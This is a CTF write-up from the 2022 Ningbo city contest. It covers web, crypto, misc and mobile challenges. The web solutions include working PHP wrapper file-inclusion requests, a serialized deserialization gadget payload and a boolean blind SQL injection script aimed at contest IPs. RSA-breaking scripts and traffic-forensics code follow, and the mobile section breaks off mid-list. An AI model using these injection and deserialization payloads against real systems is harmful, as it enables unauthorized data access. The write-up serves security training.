【7coin】2022宁波市赛WriteUp

admin 2022年5月23日01:46:08CTF专场评论91 views31943字阅读106分28秒阅读模式


Web

One Two Three

<?php

highlight_file(__FILE__);
error_reporting(0);
include("ans.php");

if(isset($_GET["one"]) && isset($_GET["two"]) && isset($_POST["three"]))
{
   $one = $_GET["one"];
   $two = $_GET["two"];

   $three = $_POST["three"];
   if(!empty($one) && !empty($two) && !empty($three))
   {
       if(file_get_contents($two) === "g00dJ0b" and file_get_contents($three) ===  "onTh1s")
       {
           var_dump($one);
           include($one);
       }
   }
   else
       die("Insufficient Parameters");
}

代码审计,用data伪协议给two和three复制,利用filter伪协议给one赋值,base64作为处理器读出来

POST /?one=php://filter/convert.base64-encode/resource=ans.php&two=data://text/plain,g00dJ0b HTTP/1.1
Host: 119.61.19.212:55001
Content-Length: 40
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://119.61.19.212:55001
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://119.61.19.212:55001/?one=php://filter/convert.base64-encode/resource=ans.php&two=data://text/plain,g00dJ0b
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=9853dac726c9531aa506675ab1597122
Connection: close

three=data%3A%2F%2Ftext%2Fplain%2ConTh1s

【7coin】2022宁波市赛WriteUp


base64解码即可

<?php
print("D0n't try t0 tr1ck me!");
// $ans = flag{8aea34fd-a111-677d-a97c-3f5e12fa16e4};

Lesen

<?php
error_reporting(0);
highlight_file(__FILE__);
$from = $_GET['from'];
$to = $_GET['to'];
if(!isset($from) or !isset($to) or stripos($from, "flag")!=FALSE)
{
   $from = "behind.php";
}

include($from);// read flag.php

if(isset($to))
{
   $a = unserialize($to);
   $a->sayTheFlag();
}

先读behind.php

http://119.61.19.212:55003/?from=php://filter/convert.base64-encode/resource=behind.php&to=

【7coin】2022宁波市赛WriteUp

base64解码

<?php
error_reporting(0);
class Test
{
       public $notthis;
       public $variable;
       public function __call($t1, $t2)
       {
           print($this->notthis);
       }

}
class NoUse
{
       public $notthis;
       public $class;
       public function __toString()
       {
           return file_get_contents($this->notthis);
       }
}
?>

构造一下,先调call再调tostring,链子比较简单就不赘述了

<?php
 class Test
 {
         public $notthis;
         public $variable;
         public function __construct(){
           $this->notthis = new NoUse();
         }
 }
 class NoUse
 {
         public $notthis;
         public $class;
         public function __construct(){
           $this->notthis = "flag.php";
         }
 }
 echo urlencode(serialize(new Test()));
?>
O%3A4%3A%22Test%22%3A2%3A%7Bs%3A7%3A%22notthis%22%3BO%3A5%3A%22NoUse%22%3A2%3A%7Bs%3A7%3A%22notthis%22%3Bs%3A8%3A%22flag.php%22%3Bs%3A5%3A%22class%22%3BN%3B%7Ds%3A8%3A%22variable%22%3BN%3B%7D

给to传参即可:

【7coin】2022宁波市赛WriteUp

GET /?to=O%3A4%3A%22Test%22%3A2%3A%7Bs%3A7%3A%22notthis%22%3BO%3A5%3A%22NoUse%22%3A2%3A%7Bs%3A7%3A%22notthis%22%3Bs%3A8%3A%22flag.php%22%3Bs%3A5%3A%22class%22%3BN%3B%7Ds%3A8%3A%22variable%22%3BN%3B%7D HTTP/1.1
Host: 119.61.19.212:55003
Accept: text/plain, */*; q=0.01
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Safari/537.36
X-Requested-With: XMLHttpRequest
Referer: http://119.61.19.212:55003/?to=O%3A4%3A%22Test%22%3A2%3A%7Bs%3A7%3A%22notthis%22%3BO%3A5%3A%22NoUse%22%3A2%3A%7Bs%3A7%3A%22notthis%22%3Bs%3A8%3A%22flag.php%22%3Bs%3A5%3A%22class%22%3BN%3B%7Ds%3A8%3A%22variable%22%3BN%3B%7D
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=9853dac726c9531aa506675ab1597122
Connection: close
<?php
die("The flag is: flag{Just_K1dd1ng_Wlth_th1s_F4ke_fl4G}")
// The real flag is: flag{9cfb19ea-b219-bfed-09bc-8e1c43fb16f3}
?>

ScoreQuery

前面爆数据库、数据表、字段的没存,原理还是简单的,布尔盲注

import requests
import string

flagstr = "1234567890qwertyuiopasdfghjklzxcvbnm}{-"
flag = ''
url = "http://119.61.19.217:55012/"

for i in range(1,45):
   for c in flagstr:
       tmp = url + "?id=0'/**/or/**/substr((select/**/F1ag/**/from/**/TheFl4g),{},1)='{}'%23".format(i,c)
       res = requests.get(tmp)
       if len(res.text) == 2263:
           flag += c
           print(flag)
           break

【7coin】2022宁波市赛WriteUp


Crypto

CrackCi4er

n1 = 11176298870415783282835275600061588657241463221871815491519552463408222565848079182034726185553217300689834006691472991129441397322597826835250447941841691221722446721416543093739804095340289908080867514473017079450311811803390124042848711639790285918640813661662931152276554784900720865966499111108283873361431767904939435365613871971085278398890357112336497323679975134482016115656435362909033743450396163540000606741105863043851991894541522258647025814542415404601472738921699995816713634130792482175987161484763035331960944948454215703767860312632963837039408460375085094414827681771078520774697140944693853984807
e1 = 65537
c1 = 2049142135212658273552941633440876974261753950640752177129652784905850352983432165679473874335026848351759145400964320244625330038089105524551008485108728021427824946995632603255126856753379578506783543964229942691440283255564049755866340136558644811545593331062075012791047810799296947253097390153311675026488654024461487543916802274460814350607787642849014894123082002047937769332643099034647856519147303533346991657725362212257992947710783698461322996483407717614984051267795550326657436918537790720050369514765616726515746420611017668922783549766178919288340405167353735762652502730158055821103551775066192064940

n2 = 14628452939723832473083511588210968910703852366589447308951932044211910559763838916687688620001947054794920424786224454850360778661660629608440528771433740169617993746720487612895876527947146072847716801945896849734515808742075452921890154367709390274374214553338701757577794537605478287979768372097249554390580052172699840182271033424438872211305351156295892595685726305130041874916916020353812984449226411372273954813167019471238042495646276279660976339456926385932462006559332070335515545249174455248514776056358317967032302203257464029754343434591788379595459973195410239904214340484044230212500028487107907195511

e2 = 257
c2 = 11943205429311148875261223425325670018169389197701624890446423663741223099186719632396529960156133015204496469625640992919935968122637192599196371711838810220085238215262686806595336187870118202291530645896788972981251362909696182206907049609819898202930423639770839482639933302200456662731930250303528462910052641021629680394116429930827997772982263970377753077015400323639702289539464290789532346689721249411805236223494026306249551854876805588677162485280664852101462907768951836328019109252702022466487857197139878204830652768250506210934257536926923356529983555063859891380882309438020999240607414375022018574614

模不互素

当存在两个公钥的 N 不互素时,我们显然可以直接对这两个数求最大公因数,然后直接获得 p,q,进而获得相应的私钥。

exp:

import gmpy2
import binascii

n1 = 11176298870415783282835275600061588657241463221871815491519552463408222565848079182034726185553217300689834006691472991129441397322597826835250447941841691221722446721416543093739804095340289908080867514473017079450311811803390124042848711639790285918640813661662931152276554784900720865966499111108283873361431767904939435365613871971085278398890357112336497323679975134482016115656435362909033743450396163540000606741105863043851991894541522258647025814542415404601472738921699995816713634130792482175987161484763035331960944948454215703767860312632963837039408460375085094414827681771078520774697140944693853984807
e1 = 65537
c1 = 2049142135212658273552941633440876974261753950640752177129652784905850352983432165679473874335026848351759145400964320244625330038089105524551008485108728021427824946995632603255126856753379578506783543964229942691440283255564049755866340136558644811545593331062075012791047810799296947253097390153311675026488654024461487543916802274460814350607787642849014894123082002047937769332643099034647856519147303533346991657725362212257992947710783698461322996483407717614984051267795550326657436918537790720050369514765616726515746420611017668922783549766178919288340405167353735762652502730158055821103551775066192064940

n2 = 14628452939723832473083511588210968910703852366589447308951932044211910559763838916687688620001947054794920424786224454850360778661660629608440528771433740169617993746720487612895876527947146072847716801945896849734515808742075452921890154367709390274374214553338701757577794537605478287979768372097249554390580052172699840182271033424438872211305351156295892595685726305130041874916916020353812984449226411372273954813167019471238042495646276279660976339456926385932462006559332070335515545249174455248514776056358317967032302203257464029754343434591788379595459973195410239904214340484044230212500028487107907195511

e2 = 257
c2 = 11943205429311148875261223425325670018169389197701624890446423663741223099186719632396529960156133015204496469625640992919935968122637192599196371711838810220085238215262686806595336187870118202291530645896788972981251362909696182206907049609819898202930423639770839482639933302200456662731930250303528462910052641021629680394116429930827997772982263970377753077015400323639702289539464290789532346689721249411805236223494026306249551854876805588677162485280664852101462907768951836328019109252702022466487857197139878204830652768250506210934257536926923356529983555063859891380882309438020999240607414375022018574614

p = gmpy2.gcd(n1,n2)

q1 = n1 // p
phi = (p-1)*(q1-1)

d = gmpy2.invert(e1,phi)
m = gmpy2.powmod(c1,d,n1)

q2 = n2 // p
phi = (p-1)*(q2-1)

d2 = gmpy2.invert(e2,phi)
m2 = gmpy2.powmod(c2,d2,n2)

print(binascii.unhexlify(hex(m)[2:]))
print(binascii.unhexlify(hex(m2)[2:]))
#flag{0df31ff-b12f-097a-b7ab-fe1a4bfb12e5}

【7coin】2022宁波市赛WriteUp


Cr4ck2

flag = "*************"
p = *************
q = *************

assert(bin(q)-2) == 1024
assert(bin(p)-2) == 1024

n = p*q
phi = (p-1)*(q-1)

e1 = **
e2 = **

c1 = pow(flag, e1, n)
c2 = pow(flag, e2, n)

print(n)
print(e1)
print(e2)
print(c1)
print(c2)

公模攻击exp:

import gmpy2
from Crypto.Util.number import long_to_bytes

n = 14571489544273684681632745165173941757355029852967262639728000988042839386897493030097099884895386115482493694058873038502860513888769546717076461092157274631880422404640774568976816310850151976919429837061384758878560393916832880369835035094654445542998583110983141044252629041042005200028747437532412882541760701913277010315019696176276304794162940731256361777150089869864848752521412637555443729084762017260965056626550279092491606837302796652497491465469860146607791410672793656097187677222298486237121302232907875363012059539134811841994652897489100941594071086553725267695160318463265760189436211892048571831049
e1 = 18181

e2 = 19937

message1 = 14086932244393217502907224674408736488830849146214227184918262698062675736724337554446711585503734671616977407523947180439538475650652413419679106435434870038055027980301567294772290568083578726775663339768961737480740922223388718943787094330870471886171540256870630059797491648906275021947443613254535459415614412289718705188895798826235866579862681303315446414825328707142227744471707921742768342732559562524019443552187374960675403256064296192626351031408014769594350992074453942709110651276633951009115468620886310509692671361261934324842739148921650085982490562922669906835464674323688759465709626540284576889210

message2 = 9788755099571270122752620318833990768386552453915390611782202313009843880011885989102462216813557305415919308702993594866012255516635580308442538867800280824955615413443022611149710694144180395588528536827198061901961298781041399064307258829088210698947995786806886824892341393690873854230422832064661235313593912677068722144241580197984421905987499008664508485233509643273752098892825326153287135195132848517181638343515469682704077797334084053581822968060796475866168907228760199308163970477417979781603099935953389513751241815586854968725454388470460653618696872424888914546835979441528674579794525553550639554293
# s & t
gcd, s, t = gmpy2.gcdext(e1, e2)
if s < 0:
   s = -s
   message1 = gmpy2.invert(message1, n)
if t < 0:
   t = -t
   message2 = gmpy2.invert(message2, n)
plain = gmpy2.powmod(message1, s, n) * gmpy2.powmod(message2, t, n) % n
print(plain)
print(long_to_bytes(plain))
#flag{afe12ec-c1be-421f-c0fa-ea2f6ceb10a0}

【7coin】2022宁波市赛WriteUp

n_n

ucnd fclsmn.rmjy.irdapc jdsncm zpmscjdp, almph_mn_yniz
ucnd hpfcpm jdsncm uyvz
jdsncm zdsl2

s = zpmscjdp(1024)
x = zpmscjdp(1024)
i = s * x
p = 0g130u7u3
k = zdsl2.jiwpcm(p, (s-1)*(x-1))
jiws_x = zdsl2.jiwpcm(s, x)
jiwx_s = zdsl2.jiwpcm(x, s)

d = almph_mn_yniz(uyvz)
f = zdsl2.snbdnk(d, p, i)

scjim(p)
scjim(k)
scjim(jiws_x)
scjim(jiwx_s)
scjim(f)

'''
19986419
3246030980112569716252525489178402976566547966168594693884910274513154299462041341004375201921016318938426026345098668299377474330375073434720935772407207944175167323817898036516011079576927822972280584550642421759163857196487310343842151887753901290056007928776238985151298531470667875043069631236869106891057021962478109360022955201129953336276429238305672598460147562806963064866859947227329083491706302615233310732434276569920504055705370558759864687603230396302816302264528911561986103345422868194300484993924394687653074699941027740263298870609889050004072341364150017277319759241334188164360195703910784166355
23389236347134283235213306702183810016424721867486963556461081084876520502820941836694411695676757754191365637169094291954507615676165999068189562213594619012687252636744435260033076208286475321060918985189871377901228212667433573382718485160649112811594950994116619369682212010587535385364596418447338709974
102920556609507191536438498232122774923059359709189772008951429751731499708926283579532737890030392620334257693429608011647339365489651578950937878926965514185822024062626226427621775843089345409431424163821245825850075741313035783453477904427927137045546100973267423868918950101645341426259141920145517101346
1553892238198363827492950017785469649883078335860404183601470514633985702148771439291915519584864956768837128975747502834867950051639396112333353729920983641277214334076161962538797900388907160490701194265684200572530520821773449401826082542234651817152190240489004982304794568360099499384170323027423530546020874791949260720440971235829841009999271630682762487975448340845503303511707467319967171026472363519627299488034799105120005884793797012235913877429590605758066993126024240880065915024533204819606519268788794771634158963247834960191894770256479582799808670787421459015846778168822826961225790849202125973374
'''

词频修复

【7coin】2022宁波市赛WriteUp

from crypto.util.number import getprime, bytes_to_long
import gmpy2


p = getprime(1024)
q = getprime(1024)
n = p * q

e = 19986419
d = 3246030980112569716252525489178402976566547966168594693884910274513154299462041341004375201921016318938426026345098668299377474330375073434720935772407207944175167323817898036516011079576927822972280584550642421759163857196487310343842151887753901290056007928776238985151298531470667875043069631236869106891057021962478109360022955201129953336276429238305672598460147562806963064866859947227329083491706302615233310732434276569920504055705370558759864687603230396302816302264528911561986103345422868194300484993924394687653074699941027740263298870609889050004072341364150017277319759241334188164360195703910784166355
invp_q = 23389236347134283235213306702183810016424721867486963556461081084876520502820941836694411695676757754191365637169094291954507615676165999068189562213594619012687252636744435260033076208286475321060918985189871377901228212667433573382718485160649112811594950994116619369682212010587535385364596418447338709974
invk_p = 102920556609507191536438498232122774923059359709189772008951429751731499708926283579532737890030392620334257693429608011647339365489651578950937878926965514185822024062626226427621775843089345409431424163821245825850075741313035783453477904427927137045546100973267423868918950101645341426259141920145517101346
c = 1553892238198363827492950017785469649883078335860404183601470514633985702148771439291915519584864956768837128975747502834867950051639396112333353729920983641277214334076161962538797900388907160490701194265684200572530520821773449401826082542234651817152190240489004982304794568360099499384170323027423530546020874791949260720440971235829841009999271630682762487975448340845503303511707467319967171026472363519627299488034799105120005884793797012235913877429590605758066993126024240880065915024533204819606519268788794771634158963247834960191894770256479582799808670787421459015846778168822826961225790849202125973374


invp_k = gmpy2.invert(p, q)
invk_p = gmpy2.invert(q, p)


d = gmpy2.invert(e, (p - 1) * (q - 1))
c = gmpy2.podmow(m, e, n)
print(e)
print(d)
print(invp_q)
print(invk_p)
print(c)

e = 19986419
d = 3246030980112569716252525489178402976566547966168594693884910274513154299462041341004375201921016318938426026345098668299377474330375073434720935772407207944175167323817898036516011079576927822972280584550642421759163857196487310343842151887753901290056007928776238985151298531470667875043069631236869106891057021962478109360022955201129953336276429238305672598460147562806963064866859947227329083491706302615233310732434276569920504055705370558759864687603230396302816302264528911561986103345422868194300484993924394687653074699941027740263298870609889050004072341364150017277319759241334188164360195703910784166355
invp_q = 23389236347134283235213306702183810016424721867486963556461081084876520502820941836694411695676757754191365637169094291954507615676165999068189562213594619012687252636744435260033076208286475321060918985189871377901228212667433573382718485160649112811594950994116619369682212010587535385364596418447338709974
invk_p = 102920556609507191536438498232122774923059359709189772008951429751731499708926283579532737890030392620334257693429608011647339365489651578950937878926965514185822024062626226427621775843089345409431424163821245825850075741313035783453477904427927137045546100973267423868918950101645341426259141920145517101346
c = 1553892238198363827492950017785469649883078335860404183601470514633985702148771439291915519584864956768837128975747502834867950051639396112333353729920983641277214334076161962538797900388907160490701194265684200572530520821773449401826082542234651817152190240489004982304794568360099499384170323027423530546020874791949260720440971235829841009999271630682762487975448340845503303511707467319967171026472363519627299488034799105120005884793797012235913877429590605758066993126024240880065915024533204819606519268788794771634158963247834960191894770256479582799808670787421459015846778168822826961225790849202125973374

Rabin加密exp:

from Crypto.Util.number import long_to_bytes
import gmpy2

e = 19986419
d = 3246030980112569716252525489178402976566547966168594693884910274513154299462041341004375201921016318938426026345098668299377474330375073434720935772407207944175167323817898036516011079576927822972280584550642421759163857196487310343842151887753901290056007928776238985151298531470667875043069631236869106891057021962478109360022955201129953336276429238305672598460147562806963064866859947227329083491706302615233310732434276569920504055705370558759864687603230396302816302264528911561986103345422868194300484993924394687653074699941027740263298870609889050004072341364150017277319759241334188164360195703910784166355
invp_q = 23389236347134283235213306702183810016424721867486963556461081084876520502820941836694411695676757754191365637169094291954507615676165999068189562213594619012687252636744435260033076208286475321060918985189871377901228212667433573382718485160649112811594950994116619369682212010587535385364596418447338709974
invk_p = 102920556609507191536438498232122774923059359709189772008951429751731499708926283579532737890030392620334257693429608011647339365489651578950937878926965514185822024062626226427621775843089345409431424163821245825850075741313035783453477904427927137045546100973267423868918950101645341426259141920145517101346
c = 1553892238198363827492950017785469649883078335860404183601470514633985702148771439291915519584864956768837128975747502834867950051639396112333353729920983641277214334076161962538797900388907160490701194265684200572530520821773449401826082542234651817152190240489004982304794568360099499384170323027423530546020874791949260720440971235829841009999271630682762487975448340845503303511707467319967171026472363519627299488034799105120005884793797012235913877429590605758066993126024240880065915024533204819606519268788794771634158963247834960191894770256479582799808670787421459015846778168822826961225790849202125973374

key = e * d - 1
cnt = 0


def solve(x, y, z):
   decode = y ** 2 - 4 * x * z
   assert gmpy2.is_square(decode)
   x1 = (-y + gmpy2.isqrt(decode)) // (2 * x)
   x2 = (-y - gmpy2.isqrt(decode)) // (2 * x)
   return x1, x2


for k in range(3, e):
   if key % k == 0:
       cnt += 1
       phi_n = key // k
       ll = invp_q - 1
       m = invp_q * invk_p - 1 + (invp_q - 1) * (invk_p - 1) - phi_n
       n = (invk_p - 1) * (invp_q * invk_p - 1)
       try:
           k1, k2 = solve(ll, m, n)
           if (invp_q * invk_p - 1) % k1 == 0:
               k2 = (invp_q * invk_p - 1) // k1
           elif (invp_q * invk_p - 1) % k2 == 0:
               k1, k2 = k2, (invp_q * invk_p - 1) // k2
           else:
               assert False
           p, q = invp_q + k2, invk_p + k1
           N = p * q

           flag = long_to_bytes(pow(c, d, N)).strip()
           print(flag)
           break
       except:
           pass
#flag{e171892fdcccfc5b0c390806b975a72c}

【7coin】2022宁波市赛WriteUp


Misc

BlackAndWhite

打开附件,发现是黑色和白色照片,猜测代表2进制,一共336张

【7coin】2022宁波市赛WriteUp

脚本如下

white = open('D:/Users/huawei/Desktop/target/0.png', 'rb').read()
black = open('D:/Users/huawei/Desktop/target/1.png', 'rb').read()

flag = ''

for i in range(336):
   color = open('D:/Users/xxxx/Desktop/target/%d.png'%i, 'rb').read()
   if(color == white):
       flag += '0'
   else:
       flag += '1'

ans = ''
length = len(flag)//8
for i in range(length):
   ans += chr(int(flag[i*8: (i+1)*8], 2))

print(ans)

【7coin】2022宁波市赛WriteUp

flag{baaf013d-f3fa-bcbe-00fb-1e1a34bb2af1}

Analyze

PDF文件

【7coin】2022宁波市赛WriteUp

base64编码过

【7coin】2022宁波市赛WriteUp

VGhlIHBhc3N3b3JkIGlzIG5vdCBqdXN0IGFib3V0IGRlY29kaW5nLCBidXQgYWxzbyBoYWNraW5nIHRoZSBaSVAh
解码之后
The password is not just about decoding, but also hacking the ZIP!

提示爆破,爆破出密码为cr4ck!*

成功解压

【7coin】2022宁波市赛WriteUp

【7coin】2022宁波市赛WriteUp

使用stegsolve打开图片

【7coin】2022宁波市赛WriteUp


拿到flag

flag{abae93fb-c31f-aeaf-91fc-0f1d42ba26e4}

DocDocDoc

打开附件

【7coin】2022宁波市赛WriteUp

D:UsersxxxxDesktopHello Flagwordmedia

这个路径下有两张图片

【7coin】2022宁波市赛WriteUp

第二张图片,使用tweakpng修改高度为960

【7coin】2022宁波市赛WriteUp

打开图片

【7coin】2022宁波市赛WriteUp

pvkq{olp281m-m2pk-kmlo-81pl-2o2m08m0pmk1}

位移密码,key=10

【7coin】2022宁波市赛WriteUp

flag{ebf281c-c2fa-acbe-81fb-2e2c08c0fca1}

Digtal_plate

流量包报错

【7coin】2022宁波市赛WriteUp

提取usbdata脚本

#!/usr/bin/env python
# coding:utf-8

import sys
import os
import numpy as np
import matplotlib.pyplot as plt

mousePositionX = 0
mousePositionY = 0

X = []
Y = []

DataFileName = "usb.dat"
data = []

def main():
   global mousePositionX
   global mousePositionY
   # check argv
   if len(sys.argv) != 3:
       print  ("Usage : ")
       print ("        python UsbMiceHacker.py data.pcap [LEFT|RIGHT|MOVE|ALL]")
       print  ("Tips : ")
       print  ("        To use this python script , you must install the numpy,matplotlib first.")
       print  ("        You can use `sudo pip install matplotlib numpy` to install it")
       print  ("Author : ")
       print  ("        WangYihang <[email protected]>")
       print  ("        If you have any questions , please contact me by email.")
       print  ("        Thank you for using.")
       exit(1)

   # get argv
   pcapFilePath = sys.argv[1]
   action = sys.argv[2]

   if action != "LEFT" and action != "ALL" and action != "RIGHT" and action != "MOVE":
       action = "LEFT"

   # get data of pcap
   command = "tshark -r '%s' -T fields -e usbhid.data > %s" % (
       pcapFilePath, DataFileName)
   print (command)
   os.system(command)

   # read data
   with open(DataFileName, "r") as f:
       for line in f:
           data.append(line[0:-1])

   # handle move
   for i in data:
       Bytes = i.split(":")
       if len(Bytes) == 8:
           horizontal = 2  # -
           vertical = 4  # |
       elif len(Bytes) == 4:
           horizontal = 1  # -
           vertical = 2  # |
       else:
           continue
       offsetX = int(Bytes[horizontal], 16)
       offsetY = int(Bytes[vertical], 16)
       if offsetX > 127:
           offsetX -= 256
       if offsetY > 127:
           offsetY -= 256
       mousePositionX += offsetX
       mousePositionY += offsetY
       if Bytes[0] == "01":
           # print "[+] Left butten."
           if action == "LEFT":
               # draw point to the image panel
               X.append(mousePositionX)
               Y.append(-mousePositionY)
       elif Bytes[0] == "02":
           # print "[+] Right Butten."
           if action == "RIGHT":
               # draw point to the image panel
               X.append(mousePositionX)
               Y.append(-mousePositionY)
       elif Bytes[0] == "00":
           # print "[+] Move."
           if action == "MOVE":
               # draw point to the image panel
               X.append(mousePositionX)
               Y.append(-mousePositionY)
       else:
           # print "[-] Known operate."
           pass
       if action == "ALL":
           # draw point to the image panel
           X.append(mousePositionX)
           Y.append(-mousePositionY)

   fig = plt.figure()
   ax1 = fig.add_subplot(111)

   ax1.set_title('[%s]-[%s] Author : WangYihang' % (pcapFilePath, action))
   ax1.scatter(X, Y, c='r', marker='o')
   plt.show()

   # clean temp data
   os.system("rm ./%s" % (DataFileName))

if __name__ == "__main__":
   main()


发现是 数位板流量(前三位是088,后8位是八个0)

判断是数位板上画图

【7coin】2022宁波市赛WriteUp

画图脚本

import sys
import os
import numpy as np
import matplotlib.pyplot as plt

data=[]
with open("usbdata.txt","r") as f:
   for line in f.readlines():
           data.append(line)
X = []
Y = []
for line in data:
       x0=int(line[4:6],16)
       x1=int(line[6:8],16)
       x=x0+x1*256
       y0=int(line[8:10],16)
       y1=int(line[10:12],16)
       y=y0+y1*256
       X.append(x)
       Y.append(-y)
fig = plt.figure()
ax1 = fig.add_subplot(111)
ax1.set_title("key")
ax1.scatter(X, Y, c='r', marker='o')
plt.show()

画图结果如下

【7coin】2022宁波市赛WriteUp

拿到一个key

kaseyd4wi2v3sc518dc84bsa4a96

binwalk -e 出来一个zip文件

【7coin】2022宁波市赛WriteUp

解压密码就是上面那个

解压出一个图片

【7coin】2022宁波市赛WriteUp

猜测是silenteye解密,解密失败

备注发现异常

【7coin】2022宁波市赛WriteUp

写的太轻,提示到数位板画画的时候,会有压力感觉

看一下前面都有

0880应该是标识所以画点的数据应该在后面

有数值的是八位

所以x四位y四位

然后发现后面有0880,0881

两个都导出一下,0880是没按压,0881是按压,把0881为前缀的数据提取出来然后描点就行了

import matplotlib.pyplot as plt
import sys
import numpy as np
import os

data=[]
with open("usbhiddata.txt","r") as f:
   for line in f.readlines():
           data.append(line)
X = []
Y = []
for line in data:
       x0=int(line[4:6],16)
       x1=int(line[6:8],16)
       x=x0+x1*256
       y0=int(line[8:10],16)
       y1=int(line[10:12],16)
       y=y0+y1*256
       X.append(x)
       Y.append(-y)
fig = plt.figure()
ax1 = fig.add_subplot(111)
ax1.set_title("key")
ax1.scatter(X, Y, c='r', marker='o')
plt.show()

提取带有压感的流量数据,画图得到

18cba496

作为key,使用slienceeye解密

【7coin】2022宁波市赛WriteUp

flag{42a12187c01a4a4f2b3f5ccd0a019656}

Mobile

andlua

apk反编译,找到res/raw路径下的lua 脚本

function doEncrypt(tv,input)
   local input_byte = {}
   local input_len = string.len(input)
   for i = 1, input_len do
       input_byte[i-1] = string.byte(input, i, i)
   end
   local a = "vm_start"
   input_byte[0] = 23
   input_byte[0] = 5
   input_byte[0] = 33
   input_byte[0] = 11
   input_byte[0] = 14
   input_byte[1] = 10
   input_byte[1] = 21
   input_byte[1] = 7
   input_byte[1] = 40
   input_byte[1] = 12
   input_byte[2] = 32
   input_byte[2] = 32
   input_byte[2] = 35
   input_byte[2] = 13
   input_byte[2] = 14
   input_byte[3] = 26
   input_byte[3] = 7
   input_byte[3] = 25
   input_byte[3] = 25
   input_byte[3] = 1
   input_byte[4] = 3
   input_byte[4] = 4
   input_byte[4] = 13
   input_byte[4] = 27
   input_byte[4] = 5
   input_byte[5] = 25
   input_byte[5] = 13
   input_byte[5] = 1
   input_byte[5] = 33
   input_byte[5] = 38
   input_byte[6] = 33
   input_byte[6] = 24
   input_byte[6] = 31
   input_byte[6] = 17
   input_byte[6] = 24
   input_byte[7] = 20
   input_byte[7] = 26
   input_byte[7] = 8
   input_byte[7] = 20
   input_byte[7] = 40
   input_byte[8] = 25
   input_byte[8] = 18
   input_byte[8] = 3
   input_byte[8] = 7
   input_byte[8] = 34
   input_byte[9] = 26
   input_byte[9] = 37
   input_byte[9] = 8
   input_byte[9] = 15
   input_byte[9] = 28
   input_byte[10] = 31
   input_byte[10] = 21
   input_byte[10] = 31
   input_byte[10] = 19
   input_byte[10] = 21
   input_byte[11] = 19
   input_byte[11] = 3
   input_byte[11] = 37
   input_byte[11] = 13
   input_byte[11] = 20
   input_byte[12] = 18
   input_byte[12] = 12
   input_byte[12] = 15
   input_byte[12] = 3
   input_byte[12] = 4
   input_byte[13] = 33
   input_byte[13] = 21
   input_byte[13] = 33
   input_byte[13] = 7
   input_byte[13] = 18
   input_byte[14] = 15
   input_byte[14] = 23
   input_byte[14] = 3
   input_byte[14] = 12
   input_byte[14] = 40
   input_byte[15] = 11
   input_byte[15] = 32
   input_byte[15] = 25
   input_byte[15] = 34
   input_byte[15] = 36
   input_byte[16] = 9
   input_byte[16] = 9
   input_byte[16] = 37
   input_byte[16] = 19
   input_byte[16] = 27
   input_byte[17] = 36
   input_byte[17] = 10
   input_byte[17] = 30
   input_byte[17] = 14
   input_byte[17] = 14
   input_byte[18] = 10
   input_byte[18] = 34
   input_byte[18] = 6
   input_byte[18] = 31
   input_byte[18] = 27
   input_byte[19] = 11
   input_byte[19] = 9
   input_byte[19] = 29
   input_byte[19] = 40
   input_byte[19] = 5
   input_byte[20] = 20
   input_byte[20] = 35
   input_byte[20] = 26
   input_byte[20] = 29
   input_byte[20] = 21
   input_byte[21] = 31
   input_byte[21] = 19
   input_byte[21] = 8
   input_byte[21] = 1
   input_byte[21] = 4
   input_byte[22] = 37
   input_byte[22] = 39
   input_byte[22] = 25
   input_byte[22] = 12
   input_byte[22] = 20
   input_byte[23] = 17
   input_byte[23] = 24
   input_byte[23] = 19
   input_byte[23] = 1
   input_byte[23] = 9
   input_byte[24] = 19
   input_byte[24] = 18
   input_byte[24] = 11
   input_byte[24] = 28
   input_byte[24] = 21
   input_byte[25] = 7
   input_byte[25] = 6
   input_byte[25] = 6
   input_byte[25] = 31
   input_byte[25] = 8
   input_byte[26] = 9
   input_byte[26] = 22
   input_byte[26] = 13
   input_byte[26] = 14
   input_byte[26] = 30
   input_byte[27] = 7
   input_byte[27] = 19
   input_byte[27] = 34
   input_byte[27] = 3
   input_byte[27] = 9
   input_byte[28] = 39
   input_byte[28] = 16
   input_byte[28] = 28
   input_byte[28] = 15
   input_byte[28] = 15
   input_byte[29] = 26
   input_byte[29] = 19
   input_byte[29] = 11
   input_byte[29] = 15
   input_byte[29] = 27
   input_byte[30] = 29
   input_byte[30] = 32
   input_byte[30] = 11
   input_byte[30] = 26
   input_byte[30] = 33
   input_byte[31] = 13
   input_byte[31] = 10
   input_byte[31] = 11
   input_byte[31] = 8
   input_byte[31] = 12
   input_byte[32] = 14
   input_byte[32] = 21
   input_byte[32] = 13
   input_byte[32] = 9
   input_byte[32] = 13
   input_byte[33] = 21
   input_byte[33] = 9
   input_byte[33] = 24
   input_byte[33] = 27
   input_byte[33] = 23
   input_byte[34] = 10
   input_byte[34] = 7
   input_byte[34] = 24
   input_byte[34] = 8
   input_byte[34] = 39
   input_byte[35] = 8
   input_byte[35] = 30
   input_byte[35] = 21
   input_byte[35] = 37
   input_byte[35] = 20
   input_byte[36] = 30
   input_byte[36] = 26
   input_byte[36] = 2
   input_byte[36] = 17
   input_byte[36] = 29
   input_byte[37] = 22
   input_byte[37] = 8
   input_byte[37] = 31
   input_byte[37] = 16
   input_byte[37] = 8
   local b = "vm_end"
   local c = "vm_check"
   tv:setText(c)
end

【7coin】2022宁波市赛WriteUp

op_num = [23, 5, 33, 11, 14, 10, 21, 7, 40, 12, 32, 32, 35, 13, 14, 26, 7, 25, 25, 1, 3, 4, 13, 27, 5, 25, 13, 1, 33,
         38, 33, 24, 31, 17, 24, 20, 26, 8, 20, 40, 25, 18, 3, 7, 34, 26, 37, 8, 15, 28, 31, 21, 31, 19, 21, 19, 3, 37,
